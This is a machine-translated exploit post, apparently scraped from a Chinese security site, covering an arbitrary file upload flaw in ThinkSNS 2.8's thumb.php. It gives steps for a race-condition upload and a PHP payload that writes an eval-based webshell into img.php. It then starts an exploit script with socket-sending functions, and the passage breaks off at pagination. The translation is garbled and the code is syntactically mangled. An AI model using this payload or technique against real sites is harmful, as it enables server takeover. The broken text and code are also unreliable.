Thinksns2. 8 file upload exploit exp-vulnerability warning-the black bar safety net

2013-02-01T00:00:00
ID MYHACK58:62201337102
Type myhack58
Reporter 佚名
Modified 2013-02-01T00:00:00

Description

Vulnerability version The presence of vulnerabilities the version: latest 2. 8 stable version. Other version not test. Vulnerability file Vulnerable file is: thumb.php Author: Wei kunpeng 1, Prepare the following PHP file and upload it to the server yourself. File content as follows: <? php echo “<? php fwrite(fopen(‘img.php’,'w’), ‘<? php @eval(\$_POST[\"xpass\"]);?& gt;’); ?& gt;” ?& gt; 2, The calculated temporary filename: Here we can see files 9 9 line just didn't notice it! in.

3, upload the temporary file. 4, the access to the temporary file. But here there is a problem, PHP script execution speed is very fast, if the hand to perform the third and fourth step, it requires the reaction rate of the more quickly! So have to write a tool to instead of people to submit data, and, in order to increase the third step the execution time for the fourth step to gain time, we need to first step in the preparation of PHP filler content, after the test, the file size is 300KB when the success rate is the highest. Too small time, too short, too large may pass up on. Exploit the file contents are as follows: this I will not explain in detail. <? php error_reporting(0); set_time_limit(0); ini_set(“default_socket_timeout”, 5); function http_send($host, $port, $headers) { $fp = fsockopen($host, $port); if (!$ fp) die(‘Connection -> fail’); fputs($fp, $headers); return $fp; } function http_recv($fp) { $ret=”"; while (! feof($fp)) $ret.= fgets($fp, 1 0 2 4); fclose($fp); return $ret; } print “\n# ThinkSns Arbitrary File Upload #\n”;

[1] [2] [3] next